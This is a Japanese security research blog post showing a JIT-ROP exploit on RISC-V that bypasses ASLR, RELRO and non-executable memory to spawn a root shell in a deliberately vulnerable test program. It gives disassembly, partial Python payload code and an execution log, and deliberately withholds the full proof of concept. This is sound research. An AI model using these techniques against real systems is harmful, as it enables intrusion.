はじめに
FFRI リサーチエンジニアの中川です。今回は近年注目を集めている RISC-V において ASLR RELRO データ領域での実行防止が有効な状況下で JIT ROP によるシェル起動をやってみたので、簡単にその紹介をします。
なお、将来的に悪用される可能性があることから、本記事では実証コードはすべて公開せず、断片的にかつ単体では実行できない状態で示します。実証コードをご覧になりたい場合には research-feedback[at]ffri.jp
([at]
は@
へ変更) までご連絡ください。
RISC-V について
RISC-V はカリフォルニア大学バークレイ校によって提案された新しい ISA です。主に次のような特徴を備えていることから注目を集めています。
- オープンかつロイヤリティフリーであり、ISA の利用に際しての制限がほとんど無く、特許の問題が発生しにくい
- これまでの ISA の研究に基づき、非常にシンプルな構成になっており、あまり使われることのない無駄な命令が定義されていない
- 命令セットのカスタマイズが可能で、幅広い用途に利用可能 (組み込み機器用の E 拡張、ベクトル命令の V 拡張など)
RISC-V の関心の高さは、管理団体である RISC-V Foundation のメンバーが直近 1 年で約 2 倍になっていることからも伺えます。また、インドが国家 ISA として RISC-V を採用することを発表、米国防高等研究計画局がセキュアマイクロコントローラーとして RISC-V を採用することを公表しており、国家レベルで RISC-V を採用する事例も出てきています。
今回はこうした注目を集めている RISC-V 上で脆弱性のあるプログラムを動かし、JIT ROP を使ってシェル起動する実証コードを作成しましたので、その実証コードの動作の概要について説明したいと思います。
実行環境
今回、以下の仮想マシンで検証を行いました。
- QEMU version 3.1.0
- Fedora 30 (Rawhide)
仮想マシンに ssh でログインした後、 cat /proc/cpuinfo
で CPU を確認してみます。
$ cat /proc/cpuinfo hart : 0 isa : rv64imafdcsu mmu : sv48 hart : 1 isa : rv64imafdcsu mmu : sv48 hart : 2 isa : rv64imafdcsu mmu : sv48 hart : 3 isa : rv64imafdcsu mmu : sv48
isa に rv64imafdcsu
というのが見えるのがわかると思います。
RISC-V はモジュラー ISA を目指しており、実装する命令セットを自由に選択できるようになっています。rv64imfadcsu
は以下の命令・モードを実装していることを示します。
- I: 整数命令 (64I の場合には、64ビットアドレッシングであることを示す)
- M: 乗除算命令
- F: 単精度浮動小数点数演算命令
- A: アトミック命令
- D: 倍精度浮動小数点数演算命令
- C: 16bit 短縮命令
- S: Supervisor mode のサポート
- U: User mode のサポート
このうち、I (もしくは、組み込み機器向けの E ) は必ず実装しなければいけないことになっており、基本命令と呼ばれます。基本命令の I に加え、 MFAD は利用される頻度が高いことから、総称してGと呼ばれます。GはGeneralから来ています。
脆弱性のあるプログラムの用意
今回脆弱性のあるプログラムとして、x64でDynamic ROPによるASLR+DEP+RELRO回避をやってみるの記事で紹介されている以下のコードを利用しました。
// bof3.c #include <unistd.h> int main() { char buf[100]; int size; read(0, &size, 8); read(0, buf, size); write(1, buf, size); return 0; }
最初に 8 バイトのデータ長を読み込み、続けてそのデータ長分を標準入力より読み込み、読み込んだデータを標準出力に表示します。 buf
のサイズが 100 バイトであり、読み込むデータが 100 バイトを超えるとバッファオーバーフローが発生する脆弱性のあるコードとなっています。
上記コードを以下のコンパイルオプションでコンパイルし、逆アセンブルすると以下のようになります。
- コンパイルオプション
gcc -O3 -fno-stack-protector -Wl,-z,relro,-z,now bof3.c -o bof3.out
- 逆アセンブル結果
00000000000103f0 <main>: 103f0: addi sp,sp,-128 103f2: addi a1,sp,4 103f4: li a2,8 103f6: li a0,0 103f8: sd ra,120(sp) 103fa: jal ra,103d0 <read@plt> 103fe: lw a2,4(sp) 10400: addi a1,sp,8 10402: li a0,0 10404: jal ra,103d0 <read@plt> 10408: lw a2,4(sp) 1040a: addi a1,sp,8 1040c: li a0,1 1040e: jal ra,103e0 <write@plt> 10412: ld ra,120(sp) 10414: li a0,0 10416: addi sp,sp,128 10418: ret
RISC-V アセンブリの詳細な説明については RISC-V 原典や最近公開されたriscv-isa-pagesなどをご参照していただければと思いますが、少しだけ説明します。
li
即値を読み込む疑似命令 これは即値をレジスタに読み込むための疑似命令です。li は load immediate の略です。li a2,8
と書けば、a2
レジスタに8を代入します。jal
ジャンプ命令 これは PC からの相対アドレス(即値として指定)を指定してジャンプする命令です。相対アドレスとしてレジスタの値を指定するための命令jalr
もあります。 jal は jamp and link の略です。addi
加算命令 これはレジスタに即値を足し込む際に使われる命令です。addi は add immediate の略です。
また、実行に際してはASLR RELROを有効にし、スタック領域でのコード実行が無効な条件下で検証を行っています。
$ sysctl -w kernel.randomize_va_space=2 # ASLR $ readelf -a bof3.out | grep BIND_NOW 0x0000000000000018 (BIND_NOW) $ readelf -a bof3.out | grep RELRO GNU_RELRO 0x0000000000000df8 0x0000000000011df8 0x0000000000011df8
JIT ROP の方針
shellを起動するにあたり、「x64でDynamic ROPによるASLR+DEP+RELRO回避をやってみる」の記事と同様、 read
write
の呼び出しを行い __lic_start_main
のアドレスを特定する必要があります。これに関しては「x64でROP stager + Return-to-dl-resolve + __libc_csu_init gadgetsによるASLR+DEP回避をやってみる」の記事で紹介されている __libc_csu_init
ガジェットを使った方法を使うことで実現できます。前節でコンパイルした実行プログラムを逆アセンブルすると
00000000000104cc <__libc_csu_init>: 104cc: addi sp,sp,-64 104ce: sd s0,48(sp) 104d0: sd s2,32(sp) 104d2: auipc s0,0x2 104d6: addi s0,s0,-1746 # 11e00 <__frame_dummy_init_array_entry> 104da: auipc s2,0x2 104de: addi s2,s2,-1746 # 11e08 <__init_array_end> 104e2: sub s2,s2,s0 104e6: sd ra,56(sp) 104e8: sd s1,40(sp) 104ea: sd s3,24(sp) 104ec: sd s4,16(sp) 104ee: sd s5,8(sp) 104f0: srai s2,s2,0x3 104f4: beqz s2,10512 <__libc_csu_init+0x46> 104f8: mv s5,a2 104fa: mv s4,a1 104fc: mv s3,a0 104fe: li s1,0 10500: ld a5,0(s0) <-- 呼び出す関数の関数ポインタをa5にセット 10502: mv a2,s5 # <-- 関数の第2引数をセット 10504: mv a1,s4 # <-- 関数の第1引数をセット 10506: mv a0,s3 # <-- 関数の題0引数をセット 10508: addi s1,s1,1 1050a: jalr a5 # <-- a5 にセットした関数を呼び出し 1050c: addi s0,s0,8 1050e: bne s2,s1,10500 <__libc_csu_init+0x34> 10512: ld ra,56(sp) # <-- スタックから必要な変数をレジスタにセット 10514: ld s0,48(sp) 10516: ld s1,40(sp) 10518: ld s2,32(sp) 1051a: ld s3,24(sp) 1051c: ld s4,16(sp) 1051e: ld s5,8(sp) 10520: addi sp,sp,64 10522: ret
のような箇所が見られます。アセンブリにコメントとして示したように、スタック上に呼び出す関数ポインタが格納されたアドレス、関数の第0引数から第2引数までを設定し、 jalr a5
にて呼び出すことができます。これを利用することで、 read
write
を呼び出すことができます。
シェル起動までの流れは
__libc_csu_init
ガジェットを用いてwrite
関数を呼び出し、__libc_start_main
の開始アドレスを特定- 再度、
write
関数を呼び出し、__libc_start_main
のアドレスを起点としてlibc
の中身を読み出し、execve
と/bin/sh
の格納されているアドレスを特定 execve
への関数ポインタを bss 領域に書き込み__libc_csu_init
ガジェットを用いてexecve
を、第0引数を/bin/sh
第1・2引数を0として呼び出し
となります。
複数回 read
write
関数を呼び出すにあたっては「x64でDynamic ROPによるASLR+DEP+RELRO回避をやってみる」の記事のように stack pivot を行う方法を最初試みましたができなかったため、(今回対象としたプログラム内に、spの値を直接変更するためのガジェットが存在しなかった)、脆弱性のある関数に制御を移し、再度バッファオーバーフローを引き起こすことにより行っています。
stack pivot ができなかったことに関しては何かしら解決する手段があるのかもしれません。これは現在、調査・検討を行っている段階です。
実証コードの説明
では実証コードの説明に入りたいと思います。
最初に __libc_csu_init
の中から
- 呼び出す関数の引数を設定するガジェット
- 上記でセットした引数で関数を呼び出すガジェット
のアドレスを取得します。次に、それら2つのガジェットを用い、 write
関数を呼び出し、 __libc_start_main
のアドレスを特定します。
該当するコードの一部分のみを抜粋すると以下のようになります。
buf = 'A' * STACK_BUFFER_SIZE buf += struct.pack('<Q', addr_ld_stack) # <- retを呼び出したあとのジャンプ先のアドレスを設定 buf += 'AAAAAAAA' # junk buf += struct.pack('<Q', 8) # s5 -> a2 buf += struct.pack('<Q', addr_got_start) # s4 -> a1 buf += struct.pack('<Q', 1) # s3 -> a0 buf += struct.pack('<Q', 1) # s2 buf += struct.pack('<Q', 0) # s1 buf += struct.pack('<Q', addr_got_write) # s0 buf += struct.pack('<Q', addr_call_a5) # ra buf += 'AAAAAAAA' # junk # ここで必要な数だけオフセットを挿入 ... buf += 'AAAAAAAA' # junk buf += struct.pack('<Q', addr_main) # ra # 脆弱性のあるプログラムを実行し、 __libc_start_main のアドレスを取得 p.stdin.write(struct.pack('<Q', len(buf))) p.stdin.write(buf) print "[+] read: %r" % p.stdout.read(len(buf)) addr_libc_start_main = struct.unpack('<Q', p.stdout.read(8))[0] print "[+] addr_libc_main = %x" % addr_libc_start_main
__libc_start_main
のアドレスを取得したあとは、メモリ上の libc.so
の中身を読み出します。その中から execve
と /bin/sh
のアドレスを特定し、 __lic_csu_init
関数を使い、 execve
を第0引数を /bin/sh
、第1と第2引数を0にして呼び出すことでシェルを起動することができます。
addr_binsh_str = addr_libc_start_main + libc_bin.index('\x2f\x62\x69\x6e\x2f\x73\x68') # <-- libc_bin は __libc_start_main を起点として 100KiB libc.so を読み出した結果が格納されている /bin/sh の文字列を libc.so から探しだしている buf = 'A' * STACK_BUFFER_SIZE buf += struct.pack('<Q', addr_ld_stack) buf += 'AAAAAAAA' # junk buf += struct.pack('<Q', 0) # s5 -> a2 buf += struct.pack('<Q', 0) # s4 -> a1 buf += struct.pack('<Q', addr_binsh_str) # s3 -> a0 buf += struct.pack('<Q', 1) # s2 buf += struct.pack('<Q', 0) # s1 buf += struct.pack('<Q', buffer_base) # s0 buf += struct.pack('<Q', addr_call_a5) # ra p.stdin.write(struct.pack('<Q', len(buf))) p.stdin.write(buf) print "[+] read: %r" % p.stdout.read(len(buf)) p.stdin.write('exec <&2 >&2\n') p.wait()
実証コードの実行例は以下のようになります。
# python exploit_jit_rop.py [+] read: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x12\x05\x01\x00\x00\x00\x00\x00AAAAAAAA\x08\x00\x00\x00\x00\x00\x00\x00\x10 \x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00\x05\x01\x00\x00\x00\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf0\x03\x01\x00\x00\x00\x00\x00' [+] addr_libc_main = 2000050046 [+] read: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x12\x05\x01\x00\x00\x00\x00\x00AAAAAAAA\x00\x00\x10\x00\x00\x00\x00\x00F\x00\x05\x00 \x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00\x05\x01\x00\x00\x00\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf0\x03\x01\x00\x00\x00\x00\x00' [+] read_libc complete. [+] read: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x12\x05\x01\x00\x00\x00\x00\x00AAAAAAAA\x08\x00\x00\x00\x00\x00\x00\x00<$\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18 \x01\x00\x00\x00\x00\x00\x00\x05\x01\x00\x00\x00\x00\x00AAAAAAAA\x08\x00\x00\x00\x00\x00\x00\x00<$\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00\x05\x01\x00\x00\x00\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf0\x03\x01\x00\x00\x00\x00\x00' [+] read: 20000b53c0 [+] write execve address complete [+] read: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x12\x05\x01\x00\x00\x00\x00\x00AAAAAAAA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x02\x12\x00 \x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00<$\x01\x00\x00\x00\x00\x00\x00\x05\x01\x00\x00\x00\x00\x00' id uid=0(root) gid=0(root) groups=0(root)
idが実行でき、shellの起動に成功していることがわかります。
おわりに
RISC-V で JIT-ROP によるシェル起動を行いました。x86/x64 と勝手が違い、スタックポインタの書き換えを行うガジェットがなく、今回は stack pivot を使わない方法を採用しましたが、もしかしたら実現できるのかもしれません。stack pivot を実現する方法については今後の課題です。
FFRI ではこうした新しいプロセッサを対象としたサイバーセキュリティの研究開発も行っております。研究開発を行える人材を募集しておりますので、興味のある方は採用ページをご参照ください。